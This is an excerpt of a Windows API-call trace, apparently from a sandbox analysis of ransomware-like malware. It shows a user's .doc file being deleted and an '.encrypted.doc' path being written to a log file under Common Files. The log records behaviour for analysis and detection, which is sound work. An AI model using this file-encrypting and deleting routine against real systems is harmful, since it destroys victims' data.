PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.892] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", lpFilePart=0x0) returned 0x55 [0035.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697d97e0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0xa3192220, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0x151a4060, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5068, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="oY6qw7y-W3iuu.doc", cAlternateFileName="OY6QW7~1.DOC")) returned 0x7c2240 [0035.892] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\oy6qw7y-w3iuu.doc")) returned 1 [0035.893] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697d97e0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0xa3192220, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0x151a4060, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5068, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="oY6qw7y-W3iuu.doc", cAlternateFileName="OY6QW7~1.DOC")) returned 0 [0035.893] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.893] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.894] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.894] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.894] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.894] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.894] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.895] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.895] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.895] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.895] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.895] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.895] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.895] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.895] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1bf3, lpOverlapped=0x0) returned 1 [0035.896] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.896] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1bf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.896] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.encrypted.doc\r\n", cchWideChar=98, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0035.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x62) returned 0x7c10a8 [0035.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.encrypted.doc\r\n", cchWideChar=98, lpMultiByteStr=0x7c10a8, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.encrypted.doc\r\n", lpUsedDefaultChar=0x0) returned 98 [0035.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0035.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0035.896] WriteFile (in: hFile=0x128, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x61, lpOverlapped=0x0) returned 1 [0035.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0035.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.896] CloseHandle (hObject=0x128) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.898] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.898] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.899] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.899] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.899] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.899] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.900] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) 